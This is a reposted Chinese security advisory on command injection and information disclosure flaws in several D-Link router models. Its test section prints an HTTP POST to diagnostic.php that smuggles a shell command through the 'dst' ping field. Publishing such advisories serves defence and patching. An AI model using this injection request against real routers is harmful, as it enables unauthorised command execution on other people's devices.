Link产品命令注入和信息泄露漏洞

发布日期:2013-04-08
更新日期:2013-04-09

受影响系统:
D-Link DIR-300
D-Link DIR-600
D-Link DIR-645
D-Link DIR-110
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58938
 
D-Link是国际著名网络设备和解决方案提供商,产品包括多种路由器设备。
 
DIR-600/DIR-300 revB/DIR-815/DIR-645/DIR-412/DIR-456/DIR-110在实现上存在多个安全漏洞,攻击者可利用这些漏洞获取敏感信息并在受影响设备中执行任意命令。
 
1、OS命令注入
 
由于dst参数缺少输入验证和会话验证,可导致注入和执行任意shell命令。
 
2、信息泄露
 
某些server banner可轻易检测到某类设备。
 
3、信息泄露
 
通过网络可获取详细的设备信息。
 
<*来源:m-1-k-3
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /diagnostic.php HTTP/1.1
 Host: xxxx
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Referer:
 Content-Length: 41
 Cookie: uid=hfaiGzkB4z
 Pragma: no-cache
 Cache-Control: no-cache
 
act=ping&amp;amp;dst=%26%20COMMAND%26
 
or

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pppps.html